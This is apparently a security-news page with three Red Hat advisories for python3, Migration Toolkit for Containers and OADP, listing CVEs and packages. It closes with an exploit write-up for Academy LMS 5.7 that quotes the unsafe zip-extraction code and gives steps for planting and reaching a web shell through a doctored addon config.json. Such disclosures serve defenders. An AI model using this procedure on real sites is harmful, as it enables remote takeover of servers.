Red Hat Security Advisory 2022-6457-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: python3 security update  
Advisory ID:       RHSA-2022:6457-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6457  
Issue date:        2022-09-13  
CVE Names:         CVE-2015-20107 CVE-2022-0391   
=====================================================================

1. Summary:

An update for python3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python(mailcap): findmatch() function does not sanitise the second  
argument (CVE-2015-20107)

* python: urllib.parse does not sanitize URLs containing ASCII newline and  
tabs (CVE-2022-0391)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2047376 - CVE-2022-0391 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs  
2075390 - CVE-2015-20107 python(mailcap): findmatch() function does not sanitise the second argument

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
platform-python-debug-3.6.8-47.el8_6.aarch64.rpm  
platform-python-devel-3.6.8-47.el8_6.aarch64.rpm  
python3-debuginfo-3.6.8-47.el8_6.aarch64.rpm  
python3-debugsource-3.6.8-47.el8_6.aarch64.rpm  
python3-idle-3.6.8-47.el8_6.aarch64.rpm  
python3-tkinter-3.6.8-47.el8_6.aarch64.rpm

ppc64le:  
platform-python-debug-3.6.8-47.el8_6.ppc64le.rpm  
platform-python-devel-3.6.8-47.el8_6.ppc64le.rpm  
python3-debuginfo-3.6.8-47.el8_6.ppc64le.rpm  
python3-debugsource-3.6.8-47.el8_6.ppc64le.rpm  
python3-idle-3.6.8-47.el8_6.ppc64le.rpm  
python3-tkinter-3.6.8-47.el8_6.ppc64le.rpm

s390x:  
platform-python-debug-3.6.8-47.el8_6.s390x.rpm  
platform-python-devel-3.6.8-47.el8_6.s390x.rpm  
python3-debuginfo-3.6.8-47.el8_6.s390x.rpm  
python3-debugsource-3.6.8-47.el8_6.s390x.rpm  
python3-idle-3.6.8-47.el8_6.s390x.rpm  
python3-tkinter-3.6.8-47.el8_6.s390x.rpm

x86_64:  
platform-python-3.6.8-47.el8_6.i686.rpm  
platform-python-debug-3.6.8-47.el8_6.i686.rpm  
platform-python-debug-3.6.8-47.el8_6.x86_64.rpm  
platform-python-devel-3.6.8-47.el8_6.i686.rpm  
platform-python-devel-3.6.8-47.el8_6.x86_64.rpm  
python3-debuginfo-3.6.8-47.el8_6.i686.rpm  
python3-debuginfo-3.6.8-47.el8_6.x86_64.rpm  
python3-debugsource-3.6.8-47.el8_6.i686.rpm  
python3-debugsource-3.6.8-47.el8_6.x86_64.rpm  
python3-idle-3.6.8-47.el8_6.i686.rpm  
python3-idle-3.6.8-47.el8_6.x86_64.rpm  
python3-test-3.6.8-47.el8_6.i686.rpm  
python3-tkinter-3.6.8-47.el8_6.i686.rpm  
python3-tkinter-3.6.8-47.el8_6.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
python3-3.6.8-47.el8_6.src.rpm

aarch64:  
platform-python-3.6.8-47.el8_6.aarch64.rpm  
python3-debuginfo-3.6.8-47.el8_6.aarch64.rpm  
python3-debugsource-3.6.8-47.el8_6.aarch64.rpm  
python3-libs-3.6.8-47.el8_6.aarch64.rpm  
python3-test-3.6.8-47.el8_6.aarch64.rpm

ppc64le:  
platform-python-3.6.8-47.el8_6.ppc64le.rpm  
python3-debuginfo-3.6.8-47.el8_6.ppc64le.rpm  
python3-debugsource-3.6.8-47.el8_6.ppc64le.rpm  
python3-libs-3.6.8-47.el8_6.ppc64le.rpm  
python3-test-3.6.8-47.el8_6.ppc64le.rpm

s390x:  
platform-python-3.6.8-47.el8_6.s390x.rpm  
python3-debuginfo-3.6.8-47.el8_6.s390x.rpm  
python3-debugsource-3.6.8-47.el8_6.s390x.rpm  
python3-libs-3.6.8-47.el8_6.s390x.rpm  
python3-test-3.6.8-47.el8_6.s390x.rpm

x86_64:  
platform-python-3.6.8-47.el8_6.x86_64.rpm  
python3-debuginfo-3.6.8-47.el8_6.i686.rpm  
python3-debuginfo-3.6.8-47.el8_6.x86_64.rpm  
python3-debugsource-3.6.8-47.el8_6.i686.rpm  
python3-debugsource-3.6.8-47.el8_6.x86_64.rpm  
python3-libs-3.6.8-47.el8_6.i686.rpm  
python3-libs-3.6.8-47.el8_6.x86_64.rpm  
python3-test-3.6.8-47.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2015-20107  
https://access.redhat.com/security/cve/CVE-2022-0391  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB2dzjgjWX9erEAQiWxxAAlWeTdVBVug0zEnEMtfv2MLICwPpP0Bfq  
fxU516CJG+wHVGuSglzEaYS/vTXHzUTDzCFLqayDImBgUTJavmK8oua7Ih7/sgc+  
zziu8+it5NBGvQRu9Tz23TSteE97AD2UeOKmBBU9SXkXmn6sJEfU899Q8dL+6xKT  
pnzRxc/eaOP85EwRRHUVegS10A3FD+kFbDMHc59GnEnQcRwSK50EGnj+Gauh3AL1  
dVXKfsplBm/wG/CR/3Ytv0yMoPdA+r9+inizhgCeYmc2DsyTGPPtZfkIiqEju4Hq  
ZB4ywxBUR3lp1o9Y1ZDfiA0iGqOiGn/SbjYXYoHNTQVMXDGwdThdzhiegGOa0iEj  
u7/SIH+trMmdbgnR9FpDQO7cjtn0PFykjb2uNHyssA24qvuFVKDsvqibpboEyYVM  
41B5zYvJsei9P4f4QR8Ep9mrScKBwvQ0Bdc8fC0pUhcRe24g8gxZEnh/ReYOOCnv  
qL1xlgUePljUjhvH3N0WuQTS+Hd0cVdtxDzMlAvjWccioNWF4byvi7HuXnePfsof  
3nd604G0SipeKa8WKXuoTk0xsd9r3/9Fjv45VjGdSGWabO3CF5lQfcca8gEf9chv  
2PJTZvaFldJQ1tv+mm7U4KzwUn3J7k4/p+aR1jDVbyXbDU9OGRtMD66r5SIufM4n  
qechXtE5LLM=  
=guoV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6457-01

Red Hat Security Advisory 2022-6429-01 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Issues addressed include bypass, code execution, and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Migration Toolkit for Containers (MTC) 1.7.4 security and bug fix update  
Advisory ID:       RHSA-2022:6429-01  
Product:           Red Hat Migration Toolkit  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6429  
Issue date:        2022-09-13  
CVE Names:         CVE-2018-25032 CVE-2019-5827 CVE-2019-13750   
                   CVE-2019-13751 CVE-2019-17594 CVE-2019-17595   
                   CVE-2019-18218 CVE-2019-19603 CVE-2019-20838   
                   CVE-2020-8559 CVE-2020-13435 CVE-2020-14155   
                   CVE-2020-15586 CVE-2020-16845 CVE-2020-24370   
                   CVE-2020-28493 CVE-2020-28500 CVE-2021-3580   
                   CVE-2021-3634 CVE-2021-3737 CVE-2021-4189   
                   CVE-2021-20095 CVE-2021-20231 CVE-2021-20232   
                   CVE-2021-23177 CVE-2021-23337 CVE-2021-25219   
                   CVE-2021-31566 CVE-2021-36084 CVE-2021-36085   
                   CVE-2021-36086 CVE-2021-36087 CVE-2021-40528   
                   CVE-2021-42771 CVE-2022-0512 CVE-2022-0639   
                   CVE-2022-0686 CVE-2022-0691 CVE-2022-1271   
                   CVE-2022-1292 CVE-2022-1586 CVE-2022-1650   
                   CVE-2022-1785 CVE-2022-1897 CVE-2022-1927   
                   CVE-2022-2068 CVE-2022-2097 CVE-2022-2526   
                   CVE-2022-24407 CVE-2022-25313 CVE-2022-25314   
                   CVE-2022-29154 CVE-2022-29824 CVE-2022-30629   
                   CVE-2022-30631 CVE-2022-32206 CVE-2022-32208   
=====================================================================

1. Summary:

The Migration Toolkit for Containers (MTC) 1.7.4 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate  
Kubernetes resources, persistent volume data, and internal container images  
between OpenShift Container Platform clusters, using the MTC web console or  
the Kubernetes API.

Security Fix(es):

* nodejs-url-parse: authorization bypass through user-controlled key  
(CVE-2022-0512)

* npm-url-parse: Authorization bypass through user-controlled key  
(CVE-2022-0686)

* npm-url-parse: authorization bypass through user-controlled key  
(CVE-2022-0691)

* eventsource: Exposure of Sensitive Information (CVE-2022-1650)

* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions  
(CVE-2020-28500)

* nodejs-lodash: command injection via template (CVE-2021-23337)

* npm-url-parse: Authorization Bypass Through User-Controlled Key  
(CVE-2022-0639)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to install and use MTC, refer to:

https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1928937 - CVE-2021-23337 nodejs-lodash: command injection via template  
1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions  
2054663 - CVE-2022-0512 nodejs-url-parse: authorization bypass through user-controlled key  
2057442 - CVE-2022-0639 npm-url-parse: Authorization Bypass Through User-Controlled Key  
2060018 - CVE-2022-0686 npm-url-parse: Authorization bypass through user-controlled key  
2060020 - CVE-2022-0691 npm-url-parse: authorization bypass through user-controlled key  
2085307 - CVE-2022-1650 eventsource: Exposure of Sensitive Information  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2019-5827  
https://access.redhat.com/security/cve/CVE-2019-13750  
https://access.redhat.com/security/cve/CVE-2019-13751  
https://access.redhat.com/security/cve/CVE-2019-17594  
https://access.redhat.com/security/cve/CVE-2019-17595  
https://access.redhat.com/security/cve/CVE-2019-18218  
https://access.redhat.com/security/cve/CVE-2019-19603  
https://access.redhat.com/security/cve/CVE-2019-20838  
https://access.redhat.com/security/cve/CVE-2020-8559  
https://access.redhat.com/security/cve/CVE-2020-13435  
https://access.redhat.com/security/cve/CVE-2020-14155  
https://access.redhat.com/security/cve/CVE-2020-15586  
https://access.redhat.com/security/cve/CVE-2020-16845  
https://access.redhat.com/security/cve/CVE-2020-24370  
https://access.redhat.com/security/cve/CVE-2020-28493  
https://access.redhat.com/security/cve/CVE-2020-28500  
https://access.redhat.com/security/cve/CVE-2021-3580  
https://access.redhat.com/security/cve/CVE-2021-3634  
https://access.redhat.com/security/cve/CVE-2021-3737  
https://access.redhat.com/security/cve/CVE-2021-4189  
https://access.redhat.com/security/cve/CVE-2021-20095  
https://access.redhat.com/security/cve/CVE-2021-20231  
https://access.redhat.com/security/cve/CVE-2021-20232  
https://access.redhat.com/security/cve/CVE-2021-23177  
https://access.redhat.com/security/cve/CVE-2021-23337  
https://access.redhat.com/security/cve/CVE-2021-25219  
https://access.redhat.com/security/cve/CVE-2021-31566  
https://access.redhat.com/security/cve/CVE-2021-36084  
https://access.redhat.com/security/cve/CVE-2021-36085  
https://access.redhat.com/security/cve/CVE-2021-36086  
https://access.redhat.com/security/cve/CVE-2021-36087  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2021-42771  
https://access.redhat.com/security/cve/CVE-2022-0512  
https://access.redhat.com/security/cve/CVE-2022-0639  
https://access.redhat.com/security/cve/CVE-2022-0686  
https://access.redhat.com/security/cve/CVE-2022-0691  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1650  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-2526  
https://access.redhat.com/security/cve/CVE-2022-24407  
https://access.redhat.com/security/cve/CVE-2022-25313  
https://access.redhat.com/security/cve/CVE-2022-25314  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyAtcdzjgjWX9erEAQgJhg/5AV9WJmzuYMrSepeTb/4U1ByaKOyTBDFD  
6tP0664gSve8r4jyUSPH7jLh3ucnr5oixoGRaYIv1velZBjwShKkNx0xYZJLJFr7  
ePL+JiiE6MeqkWWD6X+wC4dgfaplvKxqt+bEVPm9F3wUB96rIFwyrJ4IscW1rbFP  
MePUesukKWoxAqQhNOUT2AvaOxHKzSlvmHG2vKt99olmosxYMWwUwZuN89kIYv75  
GkkOUjL11GtuOnbeppwgPkzC2Z5cdgQRb7J15msVyFiC/wjaJHzkBFvUt+JUdJI1  
OQ3VYHd5+m2c3Y7nC46WAhATCoubAIFYhV5K+om6GnegYRXL6KrIu+S75gq0hWq9  
UKZHSLYO17NlXp5ycUZyJ8AxuZK2WkgXpSZRyDa3/+yYXNtU1UoIIt7wiN0Jc3pL  
81PHYvevKZTbaZEjqAPskhHkCR59vZlcqNGs2LNmlmxI87ACpMRG3faA5q+HXuPF  
nhiu74ydCdqngtv6QBOChFO70m6EY0kaUwU7si85vmSDMYIJxn+/iJl/g9zejHVl  
Rofhxo/IihgJwJR3QhA2H/b6Uku69J5Q9kE4b/cEG1oSJPdFTXxh/BL+HG+YZVGk  
1aFKIIeM0Hrl0PmlIqMJQiJrfGk0j90pBaYX+2fH3fk6I/BCg/Fwq502WjePJZA+  
okz03xUX5M4=  
=mxFS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6429-01

Red Hat Security Advisory 2022-6430-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift API for Data Protection (OADP) 1.0.4 security and bug fix update  
Advisory ID:       RHSA-2022:6430-01  
Product:           OpenShift API for Data Protection  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6430  
Issue date:        2022-09-13  
CVE Names:         CVE-2021-3634 CVE-2021-40528 CVE-2022-1271   
                   CVE-2022-1292 CVE-2022-1586 CVE-2022-1705   
                   CVE-2022-1962 CVE-2022-2068 CVE-2022-2097   
                   CVE-2022-2526 CVE-2022-21698 CVE-2022-24675   
                   CVE-2022-25313 CVE-2022-25314 CVE-2022-26691   
                   CVE-2022-29154 CVE-2022-29824 CVE-2022-30629   
                   CVE-2022-30630 CVE-2022-30631 CVE-2022-32148   
                   CVE-2022-32206 CVE-2022-32208   
=====================================================================

1. Summary:

OpenShift API for Data Protection (OADP) 1.0.4 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift API for Data Protection (OADP) enables you to back up and restore  
application resources, persistent volume data, and internal container  
images to external backup storage. OADP enables both file system-based and  
snapshot-based backups for persistent volumes.

Security Fix(es):

* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)

* golang: go/parser: stack exhaustion in all Parse* functions  
(CVE-2022-1962)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For not working (CVE-2022-32148)

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working

5. References:

https://access.redhat.com/security/cve/CVE-2021-3634  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-1962  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-2526  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-25313  
https://access.redhat.com/security/cve/CVE-2022-25314  
https://access.redhat.com/security/cve/CVE-2022-26691  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyAtaNzjgjWX9erEAQiODw//UckdgLaWW6wci0eqbXQZ7rAmlFjUKVxJ  
Og65zR67KQ1Z0Orra0bJ14Bm6LuSZUK1Tsl5XZNHy56zA/2CKER1ENm7VEsBLRu3  
UTSZo/nCRQGoccP8xH6MVsrlImGh958xwNexW53hJ9KyHzHBSipGxZVRsx8VCcfX  
THBD5zZOwpgCYNkEbBIG4pAphYjL2qMwLUGRsFS1IGYBUhIN0VY5MzKLQYfkF84R  
jIa8ITI5SI57Y7E7+/7TalfoWMPz3L/tNpEozFvWwReMFJafjNRMhLcGYPvWb09z  
7/3bfNJSnkSzlQ7zcLVKs/4xAypKBExeyQsYAgbrvrO+vl4V0RhnHjqct/TYFkOK  
ZkJeCYDo22VJU8RqwHWCMaNDAivjzipVKnAHmsfkPX4qst5U1uNKHB54AwewXkm4  
4hLhOsMhZRcqWhDp44gexBnvisrGVkeRUdORhOWjntBVUQbxv6x8h7u7boVzb5lB  
4vzS9OhbwMqUaDN1eky36GK4jnXefMicG8ivAuBqYItcTtClbNKVYhwHEPW2pm4M  
0z+yw7mWslCJp2slHXOFtHPaeI/YZUDXpaaNIOKlFAbPuBYpIldI66Hzd3yslLu5  
Ym/L9hkhFLzIUoPw2OMfUVO54+DpCJDcohIB2PbUlF6xsL0y0saKJMY2CnoM2iko  
T2Uc8FuczYg=  
=chOl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6430-01

Academy Learning Management System version 5.7 suffers from a remote shell upload vulnerability.

    # Exploit Title: Academy Learning Management System 5.7 Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/academy-course-based-learning-management-system/22703468# Version: 5.7# Tested on Ubuntu 18.04Totally wrong architecture for uploading zip files on install addon ---Vulnerable Source Code ---$zipped_file_name = $_FILES['addon_zip']['name'];    if (!empty($zipped_file_name)) {      // Create update directory.      $dir = 'uploads/addons';      if (!is_dir($dir))      mkdir($dir, 0777, true);      $path = "uploads/addons/".$zipped_file_name;      if (class_exists('ZipArchive')) {        move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);        //Unzip uploaded update file and remove zip file.        $zip = new ZipArchive;        $zip->open($path);        $zip->extractTo('uploads/addons');        $zip->close();        unlink($path);      }else{        $this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));        redirect(site_url('admin/addon'), 'refresh');      }---Exploit------get request route "/admin/addon/add" at admin panel.And then for example download "certificate addon" nulled version.in addons config.json file add""" {            "root_directory"    : "uploads/addons/certificate/others/shell.php",            "update_directory"  : "uploads/certificates/shell.php"        },"""add your webshell to others folder in addon.click install addon button.And ta daa !->get request https://your-url/uploads/certificates/shell.php

Tag

#js